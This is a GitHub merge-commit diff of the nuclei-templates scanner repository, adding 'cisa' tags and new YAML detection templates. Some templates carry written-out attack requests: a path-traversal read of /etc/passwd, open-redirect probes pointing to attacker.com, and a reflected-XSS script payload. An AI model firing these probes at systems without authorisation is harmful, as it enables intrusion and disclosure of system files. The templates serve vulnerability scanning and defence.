Merge pull request #2 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2022-06-05 22:05:10 +01:00 committed by GitHub
commit 855a34af5e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
244 changed files with 3514 additions and 1984 deletions

View File

@ -1,44 +1,7 @@
cves/2013/CVE-2013-6281.yaml
cves/2017/CVE-2017-12138.yaml
cves/2018/CVE-2018-18608.yaml
cves/2018/CVE-2018-6200.yaml
cves/2019/CVE-2019-16931.yaml
cves/2019/CVE-2019-16932.yaml
cves/2019/CVE-2019-18371.yaml
cves/2019/CVE-2019-20224.yaml
cves/2021/CVE-2021-21745.yaml
cves/2021/CVE-2021-45428.yaml
cves/2022/CVE-2022-0346.yaml
cves/2022/CVE-2022-1609.yaml
cves/2022/CVE-2022-1713.yaml
cves/2022/CVE-2022-21500.yaml
cves/2022/CVE-2022-24856.yaml
cves/2022/CVE-2022-30776.yaml
exposed-panels/drawio-flowchartmaker-panel.yaml
exposed-panels/jupyter-notebook.yaml
exposed-panels/looker-panel.yaml
exposed-panels/netdata-panel.yaml
exposed-panels/weblogic-uddiexplorer.yaml
exposures/files/xampp-environment-variables.yaml
miscellaneous/robots-txt-endpoint.yaml
misconfiguration/selenium-exposure.yaml
ssl/self-signed-ssl.yaml
technologies/nimsoft-wasp.yaml
token-spray/api-binaryedge.yaml
token-spray/api-c99.yaml
token-spray/api-debounce.yaml
token-spray/api-flickr.yaml
token-spray/api-front.yaml
token-spray/api-fullhunt.yaml
token-spray/api-google-drive.yaml
token-spray/api-intelx.yaml
token-spray/api-securitytrails.yaml
token-spray/api-sentry.yaml
token-spray/api-shodan.yaml
token-spray/api-sslmate.yaml
token-spray/api-tatum.yaml
token-spray/api-zoomeye.yaml
vulnerabilities/dedecms/dedecms-config-xss.yaml
vulnerabilities/other/digitalrebar-traversal.yaml
vulnerabilities/other/sangfor-ba-rce.yaml
vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
cves/2018/CVE-2018-14474.yaml
cves/2018/CVE-2018-16761.yaml
cves/2020/CVE-2020-29597.yaml
cves/2022/CVE-2022-29383.yaml
exposed-panels/eventum-panel.yaml
exposures/files/appsettings-file-disclosure.yaml
vulnerabilities/other/phpok-sqli.yaml

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
| tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
| panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
| xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
| wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
| cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
| wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | gy741 | 122 | file | 76 | | | | |
**262 directories, 3566 files**.
**265 directories, 3636 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
| tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
| panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
| xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
| wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
| cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
| wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | gy741 | 122 | file | 76 | | | | |

View File

@ -12,7 +12,6 @@ info:
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id:
cwe-id: CWE-77
tags: cnvd,cnvd2020,sangfor,rce

View File

@ -1,12 +1,17 @@
id: CNVD-2021-01931
info:
name: Ruoyi Management System - Arbitrary File Retrieval
name: Ruoyi Management System - Local File Inclusion
author: daffainfo,ritikchaddha
severity: high
description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
reference:
- https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
tags: ruoyi,lfi,cnvd,cnvd2021
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
requests:
- method: GET
@ -28,3 +33,5 @@ requests:
- "fonts"
- "extensions"
condition: and
# Enhanced by cs on 06/03/2022

View File

@ -1,4 +1,4 @@
id: CVE-2008-2650
id: CVE-2008-2650
info:
name: CMSimple 3.1 - Local File Inclusion
@ -15,19 +15,19 @@ info:
cve-id: CVE-2008-2650
tags: cve,cve2008,lfi
requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body

View File

@ -12,7 +12,7 @@ info:
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
classification:
cve-id: CVE-2009-1151
tags: cve,cve2009,phpmyadmin,rce,deserialization
tags: cve,cve2009,phpmyadmin,rce,deserialization,cisa
requests:
- raw:

View File

@ -14,7 +14,7 @@ info:
cve-id: CVE-2010-2861
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2010,coldfusion,lfi,adobe
tags: cve,cve2010,coldfusion,lfi,adobe,cisa
requests:
- method: GET

View File

@ -13,7 +13,7 @@ info:
- http://www.php.net/ChangeLog-5.php#5.4.2
classification:
cve-id: CVE-2012-1823
tags: rce,php,cve,cve2012
tags: rce,php,cve,cve2012,cisa
requests:
- raw:

View File

@ -12,7 +12,7 @@ info:
remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
classification:
cve-id: CVE-2013-2251
tags: cve,cve2013,rce,struts,apache,ognl
tags: cve,cve2013,rce,struts,apache,ognl,cisa
requests:
- raw:

View File

@ -13,7 +13,7 @@ info:
- http://bouk.co/blog/elasticsearch-rce/
classification:
cve-id: CVE-2014-3120
tags: cve,cve2014,elastic,rce,elasticsearch
tags: cve,cve2014,elastic,rce,elasticsearch,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2014-6271
cwe-id: CWE-78
tags: cve,cve2014,rce,shellshock
tags: cve,cve2014,rce,shellshock,cisa
requests:
- method: GET

View File

@ -12,7 +12,7 @@ info:
- http://www.securityfocus.com/bid/72585
classification:
cve-id: CVE-2015-1427
tags: cve,cve2015,elastic,rce,elasticsearch
tags: cve,cve2015,elastic,rce,elasticsearch,cisa
requests:
- raw:

View File

@ -0,0 +1,29 @@
id: CVE-2015-5354
info:
name: Novius OS 5.0.1-elche - Open Redirect
author: 0x_Akoko
severity: medium
description: Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
reference:
- https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
- https://vuldb.com/?id.76181
- https://nvd.nist.gov/vuln/detail/CVE-2015-5354
- http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2015-5354
cwe-id: CWE-601
tags: cve,cve2015,redirect,novius
requests:
- method: GET
path:
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2016-3088
cwe-id: CWE-20
tags: fileupload,cve,cve2016,apache,activemq
tags: fileupload,cve,cve2016,apache,activemq,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 8.8
cve-id: CVE-2016-6277
cwe-id: CWE-352
tags: cve,cve2016,netgear,rce,iot
tags: cve,cve2016,netgear,rce,iot,cisa
requests:
- method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-1000486
cwe-id: CWE-326
tags: cve,cve2017,primetek,rce,injection
tags: cve,cve2017,primetek,rce,injection,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2017-10271
tags: cve,cve2017,rce,oracle,weblogic,oast
tags: cve,cve2017,rce,oracle,weblogic,oast,cisa
requests:
- raw:
@ -81,16 +81,16 @@ requests:
</soapenv:Envelope>
stop-at-first-match: true
matchers-condition: and
matchers-condition: or
matchers:
- type: regex
regex:
- "<faultstring>.*</faultstring>"
- "{{randstr}}"
condition: or
- type: dsl
dsl:
- regex("<faultstring>.*</faultstring>", body)
- status_code == 500
condition: and
- type: status
status:
- 500
- 200
condition: or
- type: dsl
dsl:
- body == "{{randstr}}"
- status_code == 200
condition: and

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-12149
cwe-id: CWE-502
tags: cve,cve2017,jboss,java,rce,deserialization
tags: cve,cve2017,jboss,java,rce,deserialization,cisa
requests:
- raw:

View File

@ -19,7 +19,7 @@ info:
cvss-score: 8.1
cve-id: CVE-2017-12615
cwe-id: CWE-434
tags: cve,cve2017,apache,rce,tomcat
tags: cve,cve2017,apache,rce,tomcat,cisa
requests:
- method: PUT

View File

@ -15,7 +15,7 @@ info:
cvss-score: 8.1
cve-id: CVE-2017-17562
cwe-id: CWE-20
tags: cve,cve2017,rce,goahead,fuzz
tags: cve,cve2017,rce,goahead,fuzz,cisa
requests:
- raw:

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-3881
cwe-id: CWE-20
tags: cve,cve2017,cisco,rce,network
tags: cve,cve2017,cisco,rce,network,cisa
network:
- inputs:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 10
cve-id: CVE-2017-5638
cwe-id: CWE-20
tags: cve,cve2017,struts,rce,apache
tags: cve,cve2017,struts,rce,apache,cisa
requests:
- raw:

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-7269
cwe-id: CWE-119
tags: cve,cve2017,rce,windows,iis
tags: cve,cve2017,rce,windows,iis,cisa
requests:
- method: OPTIONS

View File

@ -14,7 +14,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-9791
cwe-id: CWE-20
tags: cve,cve2017,apache,rce,struts
tags: cve,cve2017,apache,rce,struts,cisa
requests:
- method: POST

View File

@ -14,7 +14,7 @@ info:
cvss-score: 8.1
cve-id: CVE-2017-9805
cwe-id: CWE-502
tags: cve,cve2017,apache,rce,struts
tags: cve,cve2017,apache,rce,struts,cisa
requests:
- method: POST

View File

@ -15,7 +15,7 @@ info:
cvss-score: 8.8
cve-id: CVE-2017-9822
cwe-id: CWE-20
tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization
tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization,cisa
requests:
- raw:

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-9841
cwe-id: CWE-94
tags: cve,cve2017,php,phpunit,rce
tags: cve,cve2017,php,phpunit,rce,cisa
requests:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-0296
cwe-id: CWE-22
tags: cve,cve2018,cisco,lfi,traversal
tags: cve,cve2018,cisco,lfi,traversal,cisa
requests:
- method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-1000861
cwe-id: CWE-502
tags: cve,cve2018,jenkin,rce,jenkins
tags: cve,cve2018,jenkin,rce,jenkins,cisa
requests:
- method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-score: 8.1
cve-id: CVE-2018-11776
cwe-id: CWE-20
tags: cve,cve2018,apache,rce,struts
tags: cve,cve2018,apache,rce,struts,cisa
requests:
- method: GET

View File

@ -0,0 +1,32 @@
id: CVE-2018-12675
info:
name: SV3C HD Camera L-SERIES - Open Redirect
author: 0x_Akoko
severity: medium
description: |
The SV3C HD Camera (L-SERIES V2.3.4.2103-S50-NTD-B20170508B and V2.3.4.2103-S50-NTD-B20170823B) does not perform origin checks on URLs that the camera's web interface redirects a user to. This can be leveraged to send a user to an unexpected endpoint.
reference:
- https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory
- https://vuldb.com/?id.125799
- https://nvd.nist.gov/vuln/detail/CVE-2018-12675
- https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-12675
cwe-id: CWE-601
metadata:
verified: "true"
tags: cve,cve2018,redirect,sv3c,camera,iot
requests:
- method: GET
path:
- '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com'
matchers:
- type: word
part: body
words:
- '<META http-equiv="Refresh" content="0;URL=http://attacker.com">'

View File

@ -14,7 +14,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-13379
cwe-id: CWE-22
tags: cve,cve2018,fortios
tags: cve,cve2018,fortios,cisa
requests:
- method: GET

View File

@ -0,0 +1,32 @@
id: CVE-2018-14474
info:
name: OrangeForum 1.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
reference:
- https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
- https://seclists.org/fulldisclosure/2019/Jan/32
- https://vuldb.com/?id.122045
- https://nvd.nist.gov/vuln/detail/CVE-2018-14474
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-14474
cwe-id: CWE-601
tags: cve,cve2018,redirect,orangeforum,oss
requests:
- method: GET
path:
- '{{BaseURL}}/login?next=http://attacker.com/?app.scan/'
- '{{BaseURL}}/signup?next=http://attacker.com/?app.scan/'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -17,7 +17,7 @@ info:
cwe-id: CWE-434
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2018,adobe,rce,coldfusion,fileupload
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,cisa
requests:
- raw:

View File

@ -0,0 +1,32 @@
id: CVE-2018-16761
info:
name: Eventum v3.3.4 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Eventum before 3.4.0 has an open redirect vulnerability.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
- https://github.com/eventum/eventum/
- https://www.cvedetails.com/cve/CVE-2018-16761/
- https://github.com/eventum/eventum/releases/tag/v3.4.0
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-16761
cwe-id: CWE-601
tags: cve,cve2018,redirect,eventum,oss
requests:
- method: GET
path:
- '{{BaseURL}}/select_project.php?url=http://attacker.com'
- '{{BaseURL}}/clock_status.php?current_page=http://attacker.com'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-7600
cwe-id: CWE-20
tags: cve,cve2018,drupal,rce
tags: cve,cve2018,drupal,rce,cisa
requests:
- raw:

View File

@ -14,7 +14,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7602
tags: cve,cve2018,drupal,authenticated
tags: cve,cve2018,drupal,authenticated,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 7.2
cve-id: CVE-2019-0193
cwe-id: CWE-94
tags: cve,cve2019,apache,rce,solr,oast
tags: cve,cve2019,apache,rce,solr,oast,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-10068
cwe-id: CWE-502
tags: cve,cve2019,rce,deserialization,kentico,iis
tags: cve,cve2019,rce,deserialization,kentico,iis,cisa
requests:
- method: POST

View File

@ -16,7 +16,7 @@ info:
cve-id: CVE-2019-10758
metadata:
shodan-query: http.title:"Mongo Express"
tags: cve,cve2019,mongo,mongo-express
tags: cve,cve2019,mongo,mongo-express,cisa
requests:
- raw:

View File

@ -14,7 +14,7 @@ info:
cvss-score: 10
cve-id: CVE-2019-11510
cwe-id: CWE-22
tags: cve,cve2019,pulsesecure,lfi
tags: cve,cve2019,pulsesecure,lfi,cisa
requests:
- method: GET

View File

@ -13,7 +13,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-11580
tags: cve,cve2019,atlassian,rce
tags: cve,cve2019,atlassian,rce,cisa
requests:
- method: GET

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-11581
cwe-id: CWE-74
tags: cve,cve2019,atlassian,jira,ssti,rce
tags: cve,cve2019,atlassian,jira,ssti,rce,cisa
requests:
- method: GET

View File

@ -0,0 +1,43 @@
id: CVE-2019-12581
info:
name: Zyxel ZyWall / USG / UAG - Reflected Cross-site scripting
author: n-thumann
severity: medium
description: A reflective Cross-site scripting (XSS) vulnerability in the free_time_failed.cgi CGI program in selected Zyxel ZyWall, USG, and UAG devices allows remote attackers to inject arbitrary web script or HTML via the err_msg parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-12581
- https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
- https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/
- https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-12581
cwe-id: CWE-79
metadata:
shodan-query: http.title:"ZyWall"
tags: cve,cve2019,zyxel,zywall,xss
requests:
- method: GET
path:
- "{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain);</script>"
- "Please contact with administrator."
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -0,0 +1,40 @@
id: CVE-2019-12583
info:
name: Zyxel ZyWall UAG/USG - Account Creation Access
author: n-thumann
severity: critical
description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks.
reference:
- https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
- https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
- https://nvd.nist.gov/vuln/detail/CVE-2019-12583
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2019-12583
cwe-id: CWE-425
tags: cve,cve2019,zyxel,zywall
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/free_time.cgi"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'zyFunction.js')"
- "!contains(body_1, '/free_time_transaction.cgi')"
- "!contains(body_2, '/free_time_failed.cgi?err_msg=The Free Time feature is disabled at this time.')"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/06/01

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-15107
cwe-id: CWE-78
tags: cve,cve2019,webmin,rce
tags: cve,cve2019,webmin,rce,cisa
requests:
- raw: #

View File

@ -14,7 +14,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-1653
cwe-id: CWE-200
tags: cve,cve2019,cisco
tags: cve,cve2019,cisco,cisa
requests:
- method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-16759
cwe-id: CWE-94
tags: cve,cve2019,vbulletin,rce
tags: cve,cve2019,vbulletin,rce,cisa
requests:
- raw:

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-16920
cwe-id: CWE-78
tags: cve,cve2019,dlink,rce,router,unauth
tags: cve,cve2019,dlink,rce,router,unauth,cisa
requests:
- raw:

View File

@ -1,11 +1,11 @@
id: CVE-2019-16932
info:
name: Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)
name: Visualizer <3.3.1 - Blind Server-Side Request Forgery
author: akincibor
severity: critical
description: |
This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint.
reference:
- https://wpscan.com/vulnerability/9892
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
@ -44,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/27

View File

@ -14,7 +14,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-17558
cwe-id: CWE-74
tags: cve,cve2019,apache,rce,solr,oast
tags: cve,cve2019,apache,rce,solr,oast,cisa
requests:
- raw:

View File

@ -14,7 +14,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-19781
cwe-id: CWE-22
tags: cve,cve2019,citrix,lfi
tags: cve,cve2019,citrix,lfi,cisa
requests:
- method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-20085
cwe-id: CWE-22
tags: cve,cve2019,iot,lfi
tags: cve,cve2019,iot,lfi,cisa
requests:
- method: GET

View File

@ -13,7 +13,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2019-2616
tags: cve,cve2019,oracle,xxe,oast
tags: cve,cve2019,oracle,xxe,oast,cisa
requests:
- raw:

View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-2725
cwe-id: CWE-74
tags: cve,cve2019,oracle,weblogic,rce
tags: cve,cve2019,oracle,weblogic,rce,cisa
requests:
- raw:

View File

@ -17,7 +17,7 @@ info:
cwe-id: CWE-22
metadata:
shodan-query: http.component:"Atlassian Confluence"
tags: cve,cve2019,atlassian,confluence,lfi,rce
tags: cve,cve2019,atlassian,confluence,lfi,rce,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-3929
cwe-id: CWE-78
tags: rce,cve,cve2019,oast,injection
tags: rce,cve,cve2019,oast,injection,cisa
requests:
- method: POST

View File

@ -15,7 +15,7 @@ info:
cvss-score: 8.1
cve-id: CVE-2019-6340
cwe-id: CWE-502
tags: cve,cve2019,drupal,rce
tags: cve,cve2019,drupal,rce,cisa
requests:
- method: POST

View File

@ -14,7 +14,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-7481
cwe-id: CWE-89
tags: cve,cve2019,sonicwall,sqli
tags: cve,cve2019,sonicwall,sqli,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 10
cve-id: CVE-2019-7609
cwe-id: CWE-94
tags: cve,cve2019,kibana,rce
tags: cve,cve2019,kibana,rce,cisa
requests:
- method: POST

View File

@ -18,7 +18,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-9670
cwe-id: CWE-611
tags: cve,cve2019,zimbra,xxe
tags: cve,cve2019,zimbra,xxe,cisa
requests:
- raw:

View File

@ -15,7 +15,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-9978
cwe-id: CWE-79
tags: cve,cve2019,wordpress,wp-plugin,ssrf
tags: cve,cve2019,wordpress,wp-plugin,ssrf,cisa
requests:
- method: GET

View File

@ -17,7 +17,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-10148
cwe-id: CWE-287
tags: cve,cve2020,solarwinds,rce,auth-bypass
tags: cve,cve2020,solarwinds,rce,auth-bypass,cisa
requests:
- method: GET

View File

@ -20,7 +20,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-11738
cwe-id: CWE-22
tags: cve,cve2020,wordpress,wp-plugin,lfi
tags: cve,cve2020,wordpress,wp-plugin,lfi,cisa
requests:
- method: GET

View File

@ -18,7 +18,7 @@ info:
metadata:
shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs"
verified: "true"
tags: cve,cve2020,apache,airflow,rce
tags: cve,cve2020,apache,airflow,rce,cisa
requests:
- raw:

View File

@ -20,7 +20,7 @@ info:
metadata:
verified: true
shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow"
tags: cve,cve2020,apache,airflow,unauth,auth-bypass
tags: cve,cve2020,apache,airflow,unauth,auth-bypass,cisa
requests:
- method: GET

View File

@ -12,7 +12,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-14864
tags: cve,cve2020,oracle,lfi
tags: cve,cve2020,oracle,lfi,cisa
requests:
- method: GET

View File

@ -16,7 +16,7 @@ info:
